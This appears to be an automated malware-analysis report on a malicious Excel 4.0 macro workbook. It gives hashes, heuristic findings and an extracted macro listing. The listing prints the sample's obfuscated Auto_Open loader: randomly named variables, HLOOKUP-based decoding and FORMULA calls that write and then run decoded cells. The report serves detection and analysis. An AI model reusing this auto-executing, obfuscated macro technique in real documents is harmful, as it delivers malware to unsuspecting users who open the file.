Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 618a51c89b1a9a0b…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-25 10:40:33
Authoring application: Microsoft Excel
First seen: 2021-02-09
MD5: e17302c48c47d04fe6da0debf88e8831
SHA-1: 40d0161fccbc2d77c4a2643f27e132776c96d130
SHA-256: 618a51c89b1a9a0bdb463a132c9a1eea984cb1310f01a7e79d0616a55503c4d1
Risk Score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF defined name may be stored tokenized or otherwise opaque to plain byte-string checks, but the recovered macro listing confirms that the workbook carries an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6398 bytes
SHA-256: 105f6d06f07c058b095ed60e78a9aae1140745226e8f5d7650b80078127ac519

Preview script (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  bYT
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C172 
' 0018     25 LABEL : Cell Value, String Constant - CsZosmMZkh len=0 
' 0018     24 LABEL : Cell Value, String Constant - drIXwZASO len=0 
' 0018     26 LABEL : Cell Value, String Constant - EtIQBMkywgP len=0 
' 0018     20 LABEL : Cell Value, String Constant - FnskV len=0 
' 0018     21 LABEL : Cell Value, String Constant - fvfpvL len=0 
' 0018     26 LABEL : Cell Value, String Constant - iNdhBdCIHcJ len=0 
' 0018     26 LABEL : Cell Value, String Constant - IOhPDlwKNUJ len=0 
' 0018     26 LABEL : Cell Value, String Constant - KALLEhrdxEZ len=0 
' 0018     21 LABEL : Cell Value, String Constant - kHYReq len=0 
' 0018     26 LABEL : Cell Value, String Constant - QckcseXdFvF len=0 
' 0018     27 LABEL : Cell Value, String Constant - QQCnZrbWtjOO len=0 
' 0018     21 LABEL : Cell Value, String Constant - TrzoMp len=0 
' 0018     23 LABEL : Cell Value, String Constant - tXIHeEaP len=0 
' 0018     25 LABEL : Cell Value, String Constant - usNwROCikt len=0 
' 0018     26 LABEL : Cell Value, String Constant - VKGKqJWVFJm len=0 
' 0018     21 LABEL : Cell Value, String Constant - WWYJYL len=0 
' 0018     27 LABEL : Cell Value, String Constant - xDZrMZmsyXxg len=0 
' 0018     25 LABEL : Cell Value, String Constant - yGbUyvJtTk len=0 
' 0018     23 LABEL : Cell Value, String Constant - YgDNSeAK len=0 
' 0018     21 LABEL : Cell Value, String Constant - zYqVBO len=0 
' Sheet,Reference,Formula,Value
'  bYT,C83,"SET.NAME("TrzoMp",VALUE("0"))",""
'  bYT,C85,"SET.NAME("WWYJYL",TrzoMp)",""
'  bYT,C90,"SET.NAME("YgDNSeAK",TrzoMp)",""
'  bYT,C93,"SET.NAME("FnskV",COUNTA(CsZosmMZkh))",""
'  bYT,C98,"SET.NAME("kHYReq",COUNTA(tXIHeEaP))",""
'  bYT,C103,[],""
'  bYT,C107,"SET.NAME("VKGKqJWVFJm","")",""
'  bYT,C112,"WWYJYL",""
'  bYT,C117,"SET.NAME("yGbUyvJtTk",HLOOKUP("*",CsZosmMZkh,WWYJYL,FALSE))",""
'  bYT,C119,"fvfpvL",""
'  bYT,C123,"SET.NAME("zYqVBO",TrzoMp)",""
'  bYT,C126,[],""
'  bYT,C129,"zYqVBO",""
'  bYT,C131,"EtIQBMkywgP",""
'  bYT,C135,"drIXwZASO",""
'  bYT,C137,"xDZrMZmsyXxg",""
'  bYT,C141,"SET.NAME("iNdhBdCIHcJ",VALUE(HLOOKUP("*",tXIHeEaP,xDZrMZmsyXxg,FALSE)))",""
'  bYT,C146,"QckcseXdFvF",""
'  bYT,C148,"VKGKqJWVFJm",""
'  bYT,C151,"YgDNSeAK",""
'  bYT,C153,NEXT(),""
'  bYT,C156,"KALLEhrdxEZ",""
'  bYT,C159,"SET.NAME("f",INT(T(FORMULA(T(VKGKqJWVFJm)&"",""&T(KALLEhrdxEZ)))))",""
'  bYT,C163,"IOhPDlwKNUJ",""
'  bYT,C165,NEXT(),""
'  bYT,C170,RETURN(),""
'  bYT,C197,"SET.NAME("usNwROCikt",C83)",""
'  bYT,C202,"CsZosmMZkh",""
'  bYT,C207,"SET.NAME("tXIHeEaP",R71C13)",""
'  bYT,C212,"SET.NAME("IOhPDlwKNUJ",220)",""
'  bYT,C217,"SET.NAME("QQCnZrbWtjOO",3)",""
'  bYT,C219,usNwROCikt(),""
'  bYT,C220,HALT(),""